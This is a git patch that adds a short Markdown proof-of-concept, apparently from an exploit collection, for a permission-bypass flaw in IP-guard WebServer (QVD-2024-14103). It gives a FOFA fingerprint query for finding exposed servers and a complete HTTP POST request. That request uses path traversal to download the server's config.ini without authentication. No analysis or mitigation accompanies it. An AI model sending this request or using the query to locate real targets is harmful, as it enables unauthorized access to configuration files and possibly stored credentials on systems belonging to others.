From e2a54c791de1d119b231e8b6fce64f4d4b937937 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Fri, 19 Apr 2024 22:13:59 +0800 Subject: [PATCH] =?UTF-8?q?Create=20IP-guard-WebServer=E5=AD=98=E5=9C=A8?= =?UTF-8?q?=E6=9D=83=E9=99=90=E7=BB=95=E8=BF=87=E6=BC=8F=E6=B4=9E(QVD-2024?= =?UTF-8?q?-14103).md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...bServer存在权限绕过漏洞(QVD-2024-14103).md | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 IP-guard-WebServer存在权限绕过漏洞(QVD-2024-14103).md diff --git a/IP-guard-WebServer存在权限绕过漏洞(QVD-2024-14103).md b/IP-guard-WebServer存在权限绕过漏洞(QVD-2024-14103).md new file mode 100644 index 0000000..f0345d7 --- /dev/null +++ b/IP-guard-WebServer存在权限绕过漏洞(QVD-2024-14103).md @@ -0,0 +1,21 @@ +## IP-guard WebServer存在权限绕过漏洞(QVD-2024-14103) + +## fofa +``` +icon_hash="2030860561" +``` + + +## poc +``` +POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Type: application/x-www-form-urlencoded + +path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A +```